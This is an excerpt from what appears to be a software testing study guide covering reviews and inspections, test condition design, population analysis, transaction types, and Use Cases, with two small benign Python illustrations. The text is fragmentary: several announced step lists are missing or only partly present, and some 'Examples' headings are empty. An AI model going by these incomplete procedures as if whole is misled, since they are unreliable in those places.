13. Staffing and Training Needs
14. Responsibilities
15. Schedule
16. Planning Risks and Contingencies
17. Approvals
18. Glossary
This example plan uses the case of an application system used in a hospital. The detailed test
plan is included as Appendix B.
DOCUMENT CONTROL
Control
Abstract
Distribution
History
TABLE OF CONTENTS
1. GENERAL INFORMATION
1.1. DEFINITIONS
1.2. REFERENCES
1.2.1. Document Map
1.2.2. Test Directory Location
1.2.3. Additional Reference Documents
1. Make the necessary changes to the test plan to allow the test team to fully execute the
modified plan and be in compliance with the project changes. Examples might be:
a. Reprioritize the test objectives, moving some objectives out of scope
b. Reprioritize test cases, moving some tests out of scope
c. Move some modules out of scope in the plan
d. Review resources and reallocate as necessary
2. Document, in the modified plan, the changes to the risk assessment, noting the
necessary adjustments to risk control mechanisms.
3. All relevant stakeholders must sign off on the modified plan.
Skill Category 6
Walkthroughs, Checkpoint Reviews, and Inspections
The principle of integrated quality control throughout the development life cycle is a
recurring theme in the Software Testing Body of Knowledge (STBOK). Section 1.8 of
Skill Category 1 described the different activities involved with full life cycle testing.
Section 1.8.2.1 defines verification testing along with providing several examples. In
this skill category, an in depth discussion about these verification techniques is provided.
A review is a quality control technique that relies on individuals other than the author(s) of the
deliverable (product) to evaluate that deliverable. The purpose of the review is to find errors
before the deliverable, for example, a requirements document, is delivered either to the
customer or to the next step of the development cycle.
Review tasks should be included in the project plan. Reviews should be considered activities
within the scope of the project and should be scheduled and resources allocated just like any
other project activity.
Reviews, which emphasize the quality of the products produced, can be performed throughout
the SDLC, ensuring that the “quality” factor is given as much priority as the other three.
Finding and correcting defects soon after they are introduced not only prevents ‘cascading’
defects later in the life cycle but also provides important clues regarding the root cause of the
defect, which explains how and why the defect happened in the first place.
Because reviews are performed throughout the life cycle, they support these approaches in
two ways: they add user perspective at various points during development and they stop
unwanted/wrong functions from being developed.
6.2.2 Walkthroughs
Informal reviews are usually conducted by the author of the product under review.
Walkthroughs do not require advance preparation. Walkthroughs are typically used to confirm
understanding, test ideas, and brainstorm.
The walkthrough process consists of three steps. The first step involves selecting the
walkthrough participants; the second step is the review meeting or “walk through”; and the
third step involves using the results.
The Checkpoint Review process consists of two phases. The first phase is a planning phase
which occurs at the beginning of each project that has been targeted for checkpoint reviews in
which the checkpoints are identified. The second phase includes the steps for conducting a
checkpoint review. This phase is iterated for each checkpoint review held during the project.
Figure 6-3 illustrates the planning phase and the iterative “checkpoint” phase.
6.2.4 Inspections
Inspections are used to review an individual product and to evaluate correctness based on its
input criteria (specifications).
The inspection has six steps. The first three steps involve the inspection team prior to the
actual review meeting. The fourth step is the inspection of the product. The fifth step is
performed by the producer after the product has been reviewed or “inspected.” The last step
assures that the inspection findings have been addressed in the product. Figure 6-4 illustrates
the inspection process.
6.3.5 Training
People cannot conduct effective reviews unless they are trained in how to do it! Provide initial
concepts, overview, and skills training as well as ongoing follow-up coaching.
6.4 Summary
It has been stated continuously throughout the STBOK that the most effective approach to
managing the cost of defects is to find them as early as possible. Walkthroughs, checkpoint
reviews, and inspections, which are often collectively referred to as “reviews,” are the techniques
for delivering this early detection. Reviews emphasize quality throughout the development process,
involve users/customers, and permit ‘midcourse’ corrections.
Skill Category 7
Designing Test Cases
The test objectives established in the test plan should be decomposed into individual
test conditions, then further decomposed into individual test cases and test scripts. In
Skill Category 5, the test plan included a test matrix that correlates a specific software
function to the tests that will be executed to validate that the software function works as
specified.
When the objectives have been decomposed to a level that the test case can be developed, a set
of tests can be created which will not only test the software during development, but can test
changes during the operational state of the software.
It is a common practice to use the system specifications (e.g., requirements documents, high
level design documents) as the primary source for test conditions. After all, the system
specifications are supposed to represent what the application system is going to do. The more
specific the documents are, the better the test conditions. However, as was noted in Skill
Category 4, (Risk) section 4.1.1.3 “Requirements are the most significant product risks
reported in product risk assessments.” The concern is that if we rely too heavily on system
specifications, namely the requirements documentation, we will likely miss significant
conditions that must be tested. To help mitigate that risk, the application under test must be
viewed from as many perspectives as possible when identifying the test conditions.
When identifying test conditions for the application under test, there are five perspectives that
should be utilized to ferret out as many testable conditions as possible and to reduce the risk of
missing testable conditions. These five perspectives are:
It is important to follow a logical process when identifying test conditions. This is not to say
that ad hoc approaches such as Exploratory Testing (see section 1.9.2.4) are not used or useful
when identifying test conditions. Quite the contrary, the process of identifying testable
conditions is precisely the process of exploring the application from a variety of viewpoints.
As testable conditions are discovered they provide more information about the application and
this knowledge uncovers more testable conditions. Software applications can be very complex
and the risks associated with missing testable conditions are high.
• processing functions
• timings
• validations
If you plan to use production data for test purposes, population analysis is a technique used to
identify the kinds and frequency of data that will be found in the production environment.
Population analysis involves creating reports that describe the type, frequency, and characteristics
of the data to be used in testing. For example, for numerical fields, one might want to know the
range of values contained in that field; for alphabetic data, one may want to know the longest
name in a data field; for codes, one may want to know which codes occur and how frequently
they are used.
Testers will benefit from using population analysis in the following ways:
• It identifies codes/values being used in production that were not indicated in the
software specification
• It surfaces unusual data conditions, such as a special code in a numeric field
• It provides a model for use in creating test transactions/test scripts
• It provides a model for the type and frequency of transactions that should be created for
stress testing
• It helps identify incorrect transactions for testing error processing/error handling
routines
Population analysis is best performed using a software tool designed to perform ad hoc reports
on a database. It can be performed manually but rarely does that permit the full analysis of
large-volume files.
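As a hedged illustration only (the CSV file name, column names, and field choices below are assumptions, not part of the STBOK), a minimal population-analysis sketch in Python might report value ranges for numeric fields and code frequencies for code fields:

import csv
from collections import Counter

def analyze_population(csv_path, numeric_fields, code_fields):
    """Report value ranges for numeric fields and value frequencies for code fields."""
    ranges = {field: [None, None] for field in numeric_fields}   # field -> [min, max]
    code_counts = {field: Counter() for field in code_fields}    # field -> value frequencies
    with open(csv_path, newline="") as handle:
        for row in csv.DictReader(handle):
            for field in numeric_fields:
                value = float(row[field])
                low, high = ranges[field]
                ranges[field] = [value if low is None else min(low, value),
                                 value if high is None else max(high, value)]
            for field in code_fields:
                code_counts[field][row[field]] += 1
    return ranges, code_counts

# Hypothetical production extract and field names, used purely for illustration.
ranges, codes = analyze_population("production_extract.csv",
                                   numeric_fields=["withdrawal_amt"],
                                   code_fields=["account_type"])
print(ranges)
print(codes)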
There are three types of population analyses you may wish to perform.
2. Screen population analysis - The objective of this is to identify all of the screens that
will be used by the application under test, and to gather some background data about
each screen (i.e., take screen shots and document).
The 13 types of transactions are listed and briefly described on the following pages. For each
transaction type the test concern is explained, the area responsible for developing those
transaction types is listed, and an approach describing how to create test data of that type is
included. The first two transaction types, field and record, include a list of questions to ask
when looking for testable conditions. A full list of questions that could be asked for all
thirteen types is included as Appendix C.
Testers never have enough time to create all the test data needed. Thus, there will be tradeoffs
between the extensiveness of the test conditions in each category. Using the tester’s
background and experience, the results of interaction with end users/project personnel, and
the risk assessment, the tester should indicate for each transaction type whether it is high,
medium, or low importance. These ratings are relative, meaning that approximately
one-third of all transaction types should be rated high, one-third medium, and one-third low. The
purpose of this is to indicate to those creating test conditions where emphasis should be
placed.
This test is limited to a specific field/data element. The purpose is to validate that all of the
processing related to that specific field is performed correctly. The validation will be based on
the processing specifications for that specific field. However, it will be limited to that specific
field and does not include a combination or interrelationship of the field being tested with
other fields.
The major concern is that the specifications relating to processing of a single field/data
element will not have been implemented correctly. The reason for this is the error of omission.
Specific field conditions properly documented in requirements and design may not have been
correctly transferred to program specifications, or properly implemented by the programmer.
The concern is one of accuracy of implementation and completeness of program
specifications for the specific field.
The owner of the field is responsible for the accuracy/completeness of processing for the field.
The tester may want to verify with the owner that the set of conditions used to validate the
accuracy/completeness of field processing is complete.
The following three-step approach is recommended to develop the test conditions for a field:
7.1.3.2.4 Examples
Field edits, field updates, field displays, field sizes, and invalid values processing are
examples.
# Item
1. Have all codes been validated?
2. Can fields be properly updated?
3. Is there adequate size in the field for the accumulation of totals?
4. Can the field be properly initialized?
5. If there are restrictions on the contents of the field, are those restrictions validated?
6. Are rules established for identifying and processing invalid field data?
   a. If no, develop this data for the error-handling transaction type.
   b. If yes, have test conditions been prepared to validate the specification processing for invalid field data?
7. Have a wide range of normal valid processing values been included in the test conditions?
8. For numerical fields, have the upper and lower values been tested?
9. For numerical fields, has a zero value been tested?
10. For numerical fields, has a negative test condition been prepared?
11. For alphabetical fields, has a blank condition been prepared?
12. For an alphabetical/alphanumeric field, has a test condition longer than the field length been prepared? (The purpose is to check truncation processing.)
13. Have you verified from the data dictionary that all valid conditions have been tested?
14. Have you reviewed systems specifications to determine that all valid conditions have been tested?
15. Have you reviewed requirements to determine that all valid conditions have been tested?
16. Have you verified with the owner of the data element that all valid conditions have been tested?
These conditions validate that records can be properly created, entered, processed, stored, and
retrieved. The testing is one of occurrence, as opposed to correctness. The objective of this
test is to check the process flow of records through applications.
The primary concern is that records will be lost during processing. The loss can occur prior to
processing, during processing, during retention, or at the output point. Note that there is a
close relationship between record loss and control. Control can detect the loss of a record,
while testing under this transaction type has as its objective to prevent records from being lost.
The creation of record tests requires some sort of data flow diagram/data model in order to
understand the logical flow of data. The creation of record transaction type test conditions is a
three-step process, as follows:
7.1.3.3.4 Examples
First and last records, multiple records, and duplicate records.
# Item
1. Has a condition been prepared to test the processing of the first record?
2. Has a condition been determined to validate the processing of the last record?
3. If there are multiple records per transaction, are they all processed correctly?
4. If there are multiple records on a storage media, are they all processed correctly?
5. Can two records with the same identifier be processed (e.g., two payments for the same accounts receivable invoice number)?
6. Can the first record stored be retrieved?
7. Can the last record stored be retrieved?
8. Will all of the records entered be properly stored?
9. Can all of the records stored be retrieved?
10. Do interconnecting modules have the same identifier for each record type?
11. Are record descriptions common throughout the entire software system?
12. Do current record formats coincide with the formats used on files created by other systems?
These conditions validate that all needed files are included in the system being tested and that
the files will properly interconnect with the modules that need data from those files. Note that
file is used in the context that it can be any form of file or database table.
The test concern is in the areas normally referred to as integration and system testing. It is
determining that the operating environment has been adequately established to support the
application’s processing. The concerns cover the areas of file definition, creation of files, and
the inter-coupling of the files with and between modules. Note that file conditions will also be
covered under the transaction types of search, match/merge, and states.
Some of the file test conditions must be done by the developers during Unit testing. However,
it is a good idea for everyone involved in testing the application to be aware of these test
transaction types. Rarely would end users/customers have the ability to understand or validate
file processing.
The preparation for file testing is very similar to the preparation performed by system
programmers to create the file job control. However, the testers are concerned with both the
system aspect of testing (i.e., job control works) and the correct interaction of the files with
the modules. Note that software that does not use job control has equivalent procedures to
establish interaction of the file to the modules.
The following three-step process will create the conditions necessary to validate file
processing:
7.1.3.4.4 Examples
The objective of this test transaction category is to test relationships between data elements.
Note that record and file relationships will be tested in the match/merge transaction type.
Relationships will be checked both within a single record, and between records. Relationships
can involve two or more fields. The more complex the relationship, the more difficult
“relationship” testing becomes.
The individual owners of the related data elements jointly share responsibility for relationship
checking. They should understand the relationships and be able to verify the completeness of
relationships checking.
7.1.3.5.4 Examples
Values limit values, date and time limit values, absence-absence, presence-presence, and
values out of line with the norm.
This condition tests for errors in data elements, data element relationships, records and file
relationships, as well as the logical processing conditions. Note that if error conditions are
specified, then the test for those would occur under the test transaction type indicated. For
example, if the specifications indicated what was to happen if there were no records on a file,
then under the file transaction type an error test condition would be included. However, if
error condition processing is not specified, then this category would be all-inclusive for the
non-specified conditions.
There is a major test concern that the system will be built to handle normal processing
conditions and not handle abnormal processing conditions appropriately.
2. Conduct brainstorming sessions with project personnel for structural error conditions
7.1.3.6.4 Examples
This condition tests the ability of the end user to effectively utilize the system. It includes both
an understanding of the system outputs, as well as the ability of those outputs to lead to the
correct action. This requires the tester to go beyond validating specifications to validating that
the system provides what is needed to lead the end user to the correct business action.
Two major concerns are addressed by these test conditions. The first is that the end user of the
system will not understand how the system is to be used, and thus will use it incorrectly. The
second concern is that the end user will take the wrong action based on the information
provided by the system. For example, in a bank, a loan officer may make a loan based on the
information provided, when in fact the loan should not have been made.
The end user/customer has ultimate responsibility for these test conditions. However, the
tester, who understands the process used to develop the information delivered to the end user,
has a secondary responsibility to assist the end user in preparing these test conditions.
The test approach for this condition requires the identification of the business actions taken.
They then must be related to the information to determine that the information leads to the
logical business action. This test tends to be a static test, as opposed to a dynamic test. It is a
four-step process, as follows:
1. Identify the business actions
3. Indicate the relationship between the system output and the business action taken
7.1.3.7.4 Examples
Inventory screen used to communicate quantity on hand, credit information aids in the loan
approval process, and customer inquiry provides phone number for payment follow-up.
Search capabilities involve locating records, fields, and other variables. The objective of
testing search capabilities is to validate that the search logic is correct. Search activities can
occur within a module, within a file, or within a database. They involve both simple searches
(i.e., locating a single entity) and complex searches (e.g., finding all of the accounts receivable
balances over 90 days old). Searches can be preprogrammed or special-purpose searches.
There are two major concerns over search capabilities. The first is that the preprogrammed
logic will not find the correct entity, or the totality of the correct entities. The second is that
when "what if” questions are asked the application will not support the search.
The functional test team and users of the information (during UAT) are responsible for validating
that the needed search capabilities exist and function correctly. However, because this
involves both functionality and structure, the development team has a secondary
responsibility to validate this capability.
Two approaches are needed for testing the search capabilities. The first is validating that the
existing logic works and the second is verifying that the “what if” questions can be answered
by expending reasonable effort.
There are four steps needed to test the search capabilities, as follows:
7.1.3.8.4 Examples
File search for a single record, file search for multiple records, multiple condition searches
(e.g., customers in USA only with over $1 million in purchases), and table searches.
Matching and merging are various file processing conditions. They normally involve two or
more files, but may involve an input transaction and one or more files, or an input transaction
and an internal table. The objective of testing the match/merge capabilities is to ensure that all
of the combinations of merging and matching are correctly addressed. Generally, merge
inserts records into a file or combines two or more files; while match searches for equals
between two files.
The responsibility for correct matching and merging resides with the designers of the
application system. They should create the logic that permits all of the various conditions to
be performed. Testers must validate that the logic is correct.
7.1.3.9.4 Examples
Stress testing is validating the performance of the application system when subjected to a high
volume of transactions. Stress testing has two components. One is a large volume of
transactions; and the second is the speed at which the transactions are processed (also referred
to as performance testing which covers other types like spike and soak testing). Stress testing
can apply to individuals using the system, the communications capabilities associated with the
system, as well as the system's own capabilities. Any or all of these conditions can be stress
tested.
The major test concern is that the application will not be able to perform in a production
environment. Stress testing should simulate the most hectic production environment possible.
Stress testing is an architectural/structural capability of the system. The system may be able to
produce the right results but not at the performance level needed. Thus, stress test
responsibility is a development team responsibility.
4. Develop test conditions to stress the features that contribute directly to system
performance
7.1.3.10.4 Examples
Website function response time, report turnaround time, and mobile application response
time.
Control testing validates the adequacy of the system of internal controls to ensure accurate,
complete, timely, and authorized processing. These are the controls that are normally
validated by internal and external auditors in assessing the adequacy of control. A more
detailed discussion of Testing Controls can be found in Skill Category 8.
Controls in this context are application controls, and not management controls. The concern is
that losses might accrue due to inadequate controls. The purpose of controls is to reduce risk.
If those controls are inadequate, risk exists, and thus loss may occur.
Senior management and end user/customer management bear primary responsibility for the
adequacy of controls. Some organizations have delegated the responsibility to assess control
to the internal audit function. Others leave it to the testers and project personnel to verify the
adequacy of the system of internal control.
Testing the adequacy of controls is complex. For high-risk financial applications, testers are
encouraged to involve their internal auditors.
A four-step procedure is needed to develop a good set of control transaction tests, as follows:
7.1.3.11.4 Examples
Attributes are the quality and productivity characteristics of the software being tested. They
are independent of the functional aspects, and primarily relate to the architectural/structural
aspects of a system. Attribute testing is complex and often avoided because it requires
innovative testing techniques. However, much of the dissatisfaction expressed about software
by end users/customers relates to attributes rather than functions. In Skill Category 1, section
1.2.5, Software Quality Factors and Software Quality Criteria were explained. Attribute
testing relates to that discussion. Table 7-4 lists those Attributes with a few additions.
CORRECTNESS - Assurance that the data entered, processed, and output by the application
system is accurate and complete. Accuracy and completeness are achieved through controls
over transactions and data elements. The control should commence when a transaction is
originated and conclude when the transaction data has been used for its intended purpose.
FILE INTEGRITY - Assurance that the data entered into the application system will be
returned unaltered. The file integrity procedures ensure that the right file is used and that the
data on the file and the sequence in which the data is stored and retrieved is correct.
AUTHORIZATION - Assurance that data is processed in accordance with the intents of
management. In an application system, there is both general and specific authorization for the
processing of transactions. General authorization governs the authority to conduct different
types of business while specific authorization provides the authority to perform a specific act.
AUDIT TRAIL - The capability to substantiate the processing that has occurred. The
processing of data can be supported through the retention of sufficient evidential matter to
substantiate the accuracy, completeness, timeliness, and authorization of data. The process of
saving the supporting evidential matter is frequently called an audit trail.
CONTINUITY OF PROCESSING - The ability to sustain processing in the event problems
occur. Continuity of processing assures that the necessary procedures and backup information
are available to recoup and recover operations should the integrity of operations be lost due to
problems. Continuity of processing includes the timeliness of recovery operations and the
ability to maintain processing periods when the computer is inoperable.
SERVICE LEVELS - Assurance that the desired results will be available within a time frame
acceptable to the user. To achieve the desired service level, it is necessary to match user
requirements with available resources. Resources include input/output capabilities,
communication facilities, processing, and systems software capabilities.
ACCESS CONTROL - Assurance that the application system resources will be protected
against accidental or intentional modification, destruction, misuse, and disclosure. The
security procedure is the totality of the steps taken to ensure the integrity of application data
and programs from unintentional or unauthorized acts.
COMPLIANCE - Assurance that the system is designed in accordance with organizational
methodology, policies, procedures, and standards. These requirements need to be identified,
implemented, and maintained in conjunction with other application requirements.
RELIABILITY - Assurance that the application will perform its intended function with the
required precision over an extended period of time when placed into production.
EASE OF USE - The extent of effort required to learn, operate, prepare input for, and
interpret output from the system. This test factor deals with the usability of the system to the
people interfacing with the application system.
MAINTAINABLE - The effort required to locate and fix an error in an operational system.
PORTABLE - The effort required to transfer a program from one hardware configuration
and/or software system environment to another. The effort includes data conversion, program
changes, operating system changes, and documentation changes.
COUPLING - The effort required to interface one application system with all the application
systems in the processing environment from which it receives data or to which it transmits
data.
PERFORMANCE - The amount of computing resources and code required by a system to
perform its stated functions. Performance includes both the manual and automated segments
involved in fulfilling system functions.
EASE OF OPERATION - The amount of effort required to integrate the system into the
operating environment and then to operate the application system. The procedures can be
both manual and automated.
The primary test concern is that the system will perform functionally correctly, but the quality
and productivity attributes may not be met. The primary reason these attributes are not met is
that they are not included in most software specifications. Structural components are often left
to the discretion of the project personnel; because implementing functionality takes a higher
priority than implementing attributes in most organizations, the attributes are not adequately
addressed.
The responsibility for the attributes resides primarily with the development and test team.
These should be specified in the standards for building/acquiring software systems. A
secondary responsibility resides with the end user/customer to request these attributes.
There are two aspects of testing the attributes. The first is to define the attributes, and the
second is to prioritize the attributes. The first is necessary because defining the attribute
determines the levels of quality that the development team intends to implement in the
application system. For example, if maintainability is one of the quality attributes, then the IT
standards need to state the structural characteristics that will be incorporated into software to
achieve maintainability. The second is important because emphasizing one of the quality
factors may in fact de-emphasize another. For example, it is difficult to have an operation that
is very easy to use and yet highly secure. Ease of use makes access easy, while highly secure
makes access more difficult.
Developing test conditions for the attribute test characteristics involves the following four
steps:
1. Identify attributes
The states are conditions relating to the operating environment and the functional
environment. These are special conditions which may or may not occur, and need to be
addressed by the testers.
Note: This is not to be confused with State Transition testing, a black-box testing technique
described in section 7.4.2.6.
The test concern is that these special states will cause operational problems. If the testers
validate that the software can handle these states there is less concern that the system will
abnormally terminate or function improperly during operation.
The responsibility for validating the states resides with the development and test teams.
7.1.3.13.4 Examples
The primary concern is that the application system will not be operational because the
operating procedures will not work.
The primary responsibility for testing the operating procedures resides with the datacenter or
other IT group responsible for operations. However, testers may work with them in fulfilling
this responsibility.
7.1.3.14.4 Examples
Shown below are the six steps necessary to create a test case using Business Case Analysis:
3. Continue to break the sub-types down until you have reached the lowest level.
Example: A life insurance policy may be active, lapsed, whole life, term, etc.
Section 7.4.2.7 describes Scenario Testing which aligns with Business Case Analysis.
It is possible to perform structural analysis without tools on sections of code that are not
highly complex. To perform structural analysis on entire software modules or complex
sections of code requires automation.
Actors can be divided into two groups: a primary actor is one having a goal which requires the
assistance of the system. A secondary actor is one from which the system requires assistance.
A system boundary diagram depicts the interfaces between the software under test and the
individuals, systems, and other interfaces. These interfaces or external agents are referred to
as “actors.” The purpose of the system boundary diagram is to establish the scope of the
system and to identify the actors (i.e., the interfaces) that need to be developed.
An example of a system boundary diagram for a Kiosk Event Ticketing program is illustrated
in Figure 7-1.
For the application, each system boundary needs to be defined. System boundaries can
include:
• Individuals/groups that manually interface with the software
• Other systems that interface with the software
• Libraries
• Objects within object-oriented systems
Each system boundary should be described. For each boundary an actor must be identified.
Two aspects of actor definition are required. The first is the actor description, and the second,
when possible, is the name of an individual or group who can play the role of the actor (i.e.,
represent that boundary interface). For example, in Figure 7-1 the credit card processing
system is identified as an interface. The actor is the Internet Credit Card Processing Gateway.
Identifying a resource by name can be very helpful to the development team.
The Use Case looks at what the Actor is attempting to accomplish through the system. Use
Cases provide a way to represent the user requirements and must align with the system’s
business requirements. Because of the broader definition of the Actor, it is possible to include
other parts of the processing stream in Use Case development.
Use Cases describe all the tasks that must be performed for the Actor to achieve the desired
objective and include all of the desired functionality. Using an example of an individual
purchasing an event ticket from a kiosk, one Use Case will follow a single flow uninterrupted
by errors or exceptions from beginning to end. This is typically referred to as the Happy Path.
Figure 7-2 uses the Kiosk event to explain the simple flow within the Use Cases.
Figure 7-3 expands the simple case into more detailed functionality. All of the identified
options are listed. The actions in italics represent the flow of a single Use Case (for example
Shop by Date; Select a Valid Option (Date); Ask Customer to Enter Date…).
Where there is more than one valid path through the system, each valid path is often termed a
scenario.
Other results may occur; as none of them are intended results, they represent error conditions.
If there are alternative paths that lead to a successful conclusion of the interaction (the actor
achieves the desired goal) through effective error handling, these may be added to the list of
scenarios as recovery scenarios. Unsuccessful conclusions that result in the actor abandoning
the goal are referred to as failure scenarios.
An Activity Diagram is a direct offshoot of the System Boundary Diagram. In the case of
Activity Diagrams, mapping the Use Case onto an Activity Diagram can provide a good
means of visualizing the overlay of system behavior onto business process. An Activity
Diagram representing the Use Case of logging into a system or registering in that system is
shown in Figure 7-4.
Each Use Case is uniquely identified; Karl Wiegers, author of Software Requirements1,
recommends usage of the Verb-Noun syntax for clarity. The Use Case above would be
Purchase Tickets. An alternative flow (and Use Case) that addresses use of the Cancel Option
at any point might be captioned Cancel Transaction.
While listing the various events, the System Boundary Diagrams can be developed to provide
a graphic representation of the possible entities (Figure 7-1) in the Use Case. In addition to the
main flow of a process, Use Case models (Figure 7-5) can reflect the existence of alternative
flows.
These alternative flows are related to the Use Case by the following three conventions:
<<extend>> extends the normal course by inserting another Use Case that defines an alternative
path. For example, a path might exist which allows the customer to simply see what is
available without making a purchase. This could be referred to as Check Availability.
<<include>> is a Use Case that defines common functionality shared by other Use Cases.
Process Credit Card Payment might be included as a common function if it is used elsewhere.
Exceptions are conditions that result in the task not being successfully completed. In the case
above, Option Not Available could result in no ticket purchase. In some cases these may be
developed as a special type of alternative path.
The initial development of the Use Case may be very simple and lacking in detail. One of the
advantages of the Use Case is that it can evolve and develop over the life of the project.
Because they can grow and change, Use Cases for large projects may be classified as follows:
• Essential Use Case - is described in technology free terminology and describes the
business process in the language of the Actor; it includes the goal or object
information. This initial business case will describe a process that has value to the
Actor and describes what the process does.
• System Use Case - is at a lower level of detail and describes what the system does; it
will specify the input data and the expected data results. The system Use Case will
describe how the Actor and the system interact, not just what the objective is.
Case ID - A unique identifier for each Use Case, it includes cross references to the
requirement(s) being tested so that it is possible to trace each requirement through testing.
For example:
Use Case Name - A unique short name for the Use Case that implicitly expresses the user’s
intent or purpose1. The sample event ticket case above might be captioned ChooseEventTime.
Using this nomenclature ties the individual Use Case directly to the Use Cases originally
described and allows it to be sequenced on a name basis alone.
Summary Description - A several sentence description summarizing the Use Cases. This
might appear redundant when an effective Use Case naming standard is in place, but with
large systems, it is possible to become confused about specific points of functionality.
Frequency / Iteration Number - These two pieces of information provide additional context
for the case. The first, frequency, deals with how often the actor executes or triggers the
function covered by the Use Case. This helps to determine how important this functionality is
to the overall system. Iteration number addresses how many times this set of Use Cases has
been executed. There should be a correlation between the two numbers.
Status - This is the status of the case itself: In Development, Ready for Review, and Passed or
Failed Review are typical status designations.
1. Ambler, Scott; Web services programming tips and tricks: Documenting a Use Case;
(scott.ambler@ronin-intl.com); October 2000.
Actors - The list of actors associated with the case; while the primary actor is often clear from
the summary description, the role of secondary actors is easy to miss. This may cause
problems in identifying all of the potential alternative paths.
Trigger - This is the starting point for any action in a process or sub-process. The first trigger
is always the result of interaction with the primary actor. Subsequent triggers initiate other
processes and sub-processes needed by the system to achieve the actor’s goal and to fulfill its
responsibilities.
Basic Course of Events - This is called the main path, the happy path or the primary path. It
is the main flow of logic an actor follows to achieve the desired goal. It describes how the
system works when everything functions properly. If the System Boundary Diagram contains
an <<includes>> or <<extends>>, it can be described here. Alternatively any additional
categories for <<extends>> and <<includes>> must be created. If there are relatively few,
they should be broken out so they will not be overlooked. If they are common, either practice
will work.
Alternative Events - Less frequently used paths of logic, these may be the result of
alternative work processes or an error condition. Alternative events are often signaled by the
existence of an <<exception>> in the System Boundary Diagram.
Pre-Conditions - A list of conditions, if any, which must be met before the Use Case can be
properly executed. In the Kiosk examples cited previously, before a payment can be
calculated, an event, and the number and location of seats must be selected. During Unit and
System testing this situation is handled using Stubs. By acceptance testing, there should be no
Stubs left in the system.
Business Rules and Assumptions - Any business rules not clearly expressed in either the
main or alternate paths must be stated. These may include disqualifying responses to pre-
conditions. Assumptions about the domain that are not made explicit in the main and alternate
paths must be recorded. All assumptions should have been verified prior to the product
arriving for acceptance testing.
Post Conditions - A list of conditions, if any, which will be true after the Use Case has finished
successfully. In the Kiosk example the Post Conditions might include:
• The customer receives the correct number of tickets
• Each ticket displays the correct event name and price
• Each ticket shows the requested date, time, and seat location
• The total price for the ticket(s) was properly calculated
• The customer account is properly debited for the transaction
• The ticket inventory is properly updated to reflect tickets issued
• The accounts receivable system receives the correct payment information
Notes - Any relevant information not previously recorded should be entered here. If certain
types of information appear consistently, create a category for them.
Author, Action and Date - This is a sequential list of all of the authors and the date(s) of their
work on the Use Case. Many Use Cases are developed and reworked multiple times over the
course of a large project. This information will help research any problems with the case that
might arise.
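As a non-authoritative sketch, the Use Case fields described above could be collected into a single record; the dataclass and its field names below are assumptions made for illustration, not part of any standard template:

from dataclasses import dataclass, field
from typing import List

@dataclass
class UseCase:
    case_id: str                      # unique identifier, cross-referenced to requirements
    name: str                         # short Verb-Noun name, e.g., "Purchase Tickets"
    summary: str                      # several-sentence summary description
    frequency: str                    # how often the actor triggers this function
    iteration: int                    # how many times this set of Use Cases has been executed
    status: str                       # e.g., "In Development", "Ready for Review"
    actors: List[str]                 # primary and secondary actors
    trigger: str                      # starting point for any action in the process
    basic_course: List[str] = field(default_factory=list)        # happy path steps
    alternative_events: List[str] = field(default_factory=list)  # less frequently used paths
    pre_conditions: List[str] = field(default_factory=list)
    business_rules: List[str] = field(default_factory=list)
    post_conditions: List[str] = field(default_factory=list)
    notes: str = ""
    history: List[str] = field(default_factory=list)             # author, action, and date entries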
Using the Kiosk example above, it becomes clear this process will require access to many
kinds of information from multiple sources. Although no design decisions are ready to be
made about how to access that data, the requirement to do so is obvious. A quick survey of
entertainment purveyors (the source of the tickets) may reveal that while hockey, theatre, and
symphony tickets are readily accessible, football tickets are not. This may lead to a change in
scope to exclude football tickets or in an upward revision of the time and cost estimates for
achieving that functionality.
Likewise, the Use Case provides an excellent entrée into the testing effort, to such an extent
that for many organizations, the benefits of Use Cases for requirements are ignored in the
effort to jump start testing! Further to the relationship of Use Cases to testing, the iteration
process may require a little explanation. As the Use Case evolves from a purely business event
focus to include more system information, it may be desirable to maintain several versions or
levels of the Use Case. For example the initial Use Case, developed during the first JAD
session(s), might be Iteration 1; as it is expanded to include systems information, it becomes
Iteration 2 and when fully configured to include the remaining testing related information it is
Iteration 3. Use of common Iteration levels across projects will reduce confusion and aid
applicability of the Use Case.
Additional testable conditions are derived from the exceptions and alternative course of the
Use Case (alternate path(s)). Note that additional detail may need to be added to support the
actual testing of all the possible scenarios of the Use Case.
During the development of Use Cases, the components of pre-conditions, the process flow, the
business rules, and the post-conditions are documented. Each of these components will be a
focus for evaluation during the test.
The most important part of developing test cases from Use Cases is to understand the flow of
events. The flows of events are the happy path, the sad path, and the alternate event paths. The
happy path is what normally happens when the Use Case is performed. The sad path
represents a correct path that does not produce the desired results, which is what the application
should do on that path. The alternate paths represent detours off the happy path that can
still yield the results of the happy path. Understanding the flow is a critical first step. The
various diagrams (e.g., Use Case activity map) generated during Use Case development are
invaluable in this process.
The next step in the process is to take each event flow as identified in the previous step and
create Use Case scenarios. A Use Case scenario is a complete path through the Use Case for a
particular flow. The happy path would be one of the Use Case scenarios.
Once all the Use Case scenarios are written, at least one test case, and in most cases more than
one test case, will be developed for each scenario. The test case should ensure that:
1. The test will not initiate if any of the pre-conditions are wrong.
3. The Use Case for the particular test produces the conditions and/or output as
specified in the post-conditions.
The detailed development of test cases from Use Cases will utilize test design techniques
described in section 7.4.
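A minimal sketch of one such test case, assuming the kiosk Purchase Tickets Use Case and illustrative field names and values (none of which are prescribed by the STBOK), might look like this:

# One test case derived from the happy-path scenario of the Purchase Tickets Use Case.
# Pre-conditions are checked before execution and post-conditions verified afterwards.
happy_path_test_case = {
    "use_case": "Purchase Tickets",
    "scenario": "happy path",
    "pre_conditions": ["event selected", "seats selected", "valid payment method available"],
    "steps": ["enter ticket quantity", "confirm seat selection",
              "process credit card payment", "print tickets"],
    "post_conditions": ["correct number of tickets issued",
                        "ticket inventory updated to reflect tickets issued",
                        "customer account debited for the transaction"],
}
print(happy_path_test_case["scenario"])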
but it is the journey taken to arrive at those results that differs. Table 7-5 compares the
characteristics of a User Story and Use Case.
As defined in section 7.2.1, a Use Case describes the interaction between an Actor (which can
be person or another system) and the System. The development of Use Cases is a well-defined
process resulting in specific documents. While Use Cases can be iterative in nature the
primary goal is to document the system early in the life cycle.
Unlike a Use Case, a User Story is a short description of something that a customer will do
when they use an application (software system). The User Story is focused on the value or
result a customer would receive from doing whatever it is the application does. User Stories
are written from the point of view of a person using the application. Mike Cohn, a respected
Agile expert and contributor to the invention of the Scrum software development
methodology, suggests the User Story format as: “As an [actor] I want [action] so that
[achievement].” The User Story starts with that simple description and the details of the User
Story emerge organically as part of the iterative process.
Independent - A User Story is independent of other User Stories and stories do not overlap.
